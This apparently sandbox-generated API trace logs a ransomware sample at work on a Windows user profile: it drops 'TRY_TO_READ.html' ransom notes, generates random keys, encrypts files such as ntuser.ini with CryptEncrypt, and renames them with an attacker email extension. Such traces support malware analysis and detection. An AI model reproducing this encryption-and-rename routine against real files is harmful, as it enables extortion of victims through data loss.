	[0053.077] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.077] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589778 | out: hHeap=0x540000) returned 1
	[0053.077] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.078] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.078] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.078] CloseHandle (hObject=0x450) returned 1
	[0053.078] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.078] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.078] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.078] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.078] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d48b70, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9d48b70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d6ecd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0053.079] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.079] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.079] GetLastError () returned 0x0
	[0053.079] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb4f53100, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xb4f53100, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1
	[0053.079] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.079] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.079] GetLastError () returned 0x0
	[0053.079] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.079] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5da0d8 | out: hHeap=0x540000) returned 1
	[0053.079] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.080] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.080] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.080] CloseHandle (hObject=0x450) returned 1
	[0053.083] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.083] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.083] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.083] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58bb50 | out: hHeap=0x540000) returned 1
	[0053.083] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb4f53100, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xb4f53100, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0
	[0053.083] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5d9290
	[0053.083] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8040
	[0053.083] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0053.083] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8040 | out: pbBuffer=0x5b8040) returned 1
	[0053.083] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596760 | out: pbBuffer=0x596760) returned 1
	[0053.083] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", dwFileAttributes=0x80) returned 1
	[0053.083] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 41
	[0053.083] GetProcessHeap () returned 0x540000
	[0053.083] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb8) returned 0x5a2048
	[0053.083] lstrcpyW (in: lpString1=0x5a2048, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini"
	[0053.083] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0053.083] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0053.087] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.087] GetProcessHeap () returned 0x540000
	[0053.087] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a2048 | out: hHeap=0x540000) returned 1
	[0053.087] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=20) returned 1
	[0053.087] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x14
	[0053.087] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0053.087] GetProcessHeap () returned 0x540000
	[0053.087] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8148
	[0053.087] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8148*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8148*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0053.088] WriteFile (in: hFile=0x450, lpBuffer=0x5b8148*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8148*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0053.089] WriteFile (in: hFile=0x450, lpBuffer=0x596760*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596760*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0053.089] WriteFile (in: hFile=0x450, lpBuffer=0x596760*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596760*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0053.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x14) returned 0x598290
	[0053.089] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x14) returned 0x5982b0
	[0053.089] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0053.089] ReadFile (in: hFile=0x450, lpBuffer=0x598290, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x598290*, lpNumberOfBytesRead=0x3a1f778*=0x14, lpOverlapped=0x0) returned 1
	[0053.089] SetFilePointer (in: hFile=0x450, lDistanceToMove=-20, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0053.089] WriteFile (in: hFile=0x450, lpBuffer=0x5982b0*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5982b0*, lpNumberOfBytesWritten=0x3a1f778*=0x14, lpOverlapped=0x0) returned 1
	[0053.089] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598290 | out: hHeap=0x540000) returned 1
	[0053.089] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5982b0 | out: hHeap=0x540000) returned 1
	[0053.089] CloseHandle (hObject=0x450) returned 1
	[0053.090] GetProcessHeap () returned 0x540000
	[0053.090] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8148 | out: hHeap=0x540000) returned 1
	[0053.090] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8040 | out: hHeap=0x540000) returned 1
	[0053.090] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.090] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.090] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9070 | out: hHeap=0x540000) returned 1
	[0053.090] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8040
	[0053.090] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8148
	[0053.090] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0053.090] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8148 | out: pbBuffer=0x5b8148) returned 1
	[0053.090] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596760 | out: pbBuffer=0x596760) returned 1
	[0053.090] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x80) returned 1
	[0053.091] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 123
	[0053.091] GetProcessHeap () returned 0x540000
	[0053.091] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x15c) returned 0x5da0d8
	[0053.091] lstrcpyW (in: lpString1=0x5da0d8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms"
	[0053.091] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR"
	[0053.091] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0053.091] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0053.091] GetProcessHeap () returned 0x540000
	[0053.091] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5da0d8 | out: hHeap=0x540000) returned 1
	[0053.091] CloseHandle (hObject=0xffffffff) returned 0
	[0053.091] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8040 | out: hHeap=0x540000) returned 1
	[0053.091] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b7f38 | out: hHeap=0x540000) returned 1
	[0053.091] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b7f38
	[0053.091] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8040
	[0053.091] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0053.091] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8040 | out: pbBuffer=0x5b8040) returned 1
	[0053.091] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596770 | out: pbBuffer=0x596770) returned 1
	[0053.091] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x80) returned 1
	[0053.091] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 123
	[0053.092] GetProcessHeap () returned 0x540000
	[0053.092] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x15c) returned 0x5da0d8
	[0053.092] lstrcpyW (in: lpString1=0x5da0d8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms"
	[0053.092] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR"
	[0053.092] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0053.092] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0053.092] GetProcessHeap () returned 0x540000
	[0053.092] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5da0d8 | out: hHeap=0x540000) returned 1
	[0053.092] CloseHandle (hObject=0xffffffff) returned 0
	[0053.092] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b7f38 | out: hHeap=0x540000) returned 1
	[0053.092] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b7e30 | out: hHeap=0x540000) returned 1
	[0053.092] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598c88
	[0053.092] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b7e30
	[0053.092] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596780
	[0053.092] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b7e30 | out: pbBuffer=0x5b7e30) returned 1
	[0053.092] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596780 | out: pbBuffer=0x596780) returned 1
	[0053.092] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", dwFileAttributes=0x80) returned 1
	[0053.092] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 86
	[0053.092] GetProcessHeap () returned 0x540000
	[0053.092] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x112) returned 0x5da0d8
	[0053.092] lstrcpyW (in: lpString1=0x5da0d8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf"
	[0053.092] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0053.093] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0053.093] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0053.093] GetProcessHeap () returned 0x540000
	[0053.093] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5da0d8 | out: hHeap=0x540000) returned 1
	[0053.093] CloseHandle (hObject=0xffffffff) returned 0
	[0053.093] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598c88 | out: hHeap=0x540000) returned 1
	[0053.093] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0053.093] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5d9290
	[0053.093] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b7f38
	[0053.093] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596790
	[0053.093] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b7f38 | out: pbBuffer=0x5b7f38) returned 1
	[0053.093] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596790 | out: pbBuffer=0x596790) returned 1
	[0053.093] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", dwFileAttributes=0x80) returned 1
	[0053.093] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned 46
	[0053.093] GetProcessHeap () returned 0x540000
	[0053.093] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc2) returned 0x5da0d8
	[0053.093] lstrcpyW (in: lpString1=0x5da0d8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2"
	[0053.093] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2.12781717671972518758.ex_parvis@aol.com.AIR"
	[0053.093] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
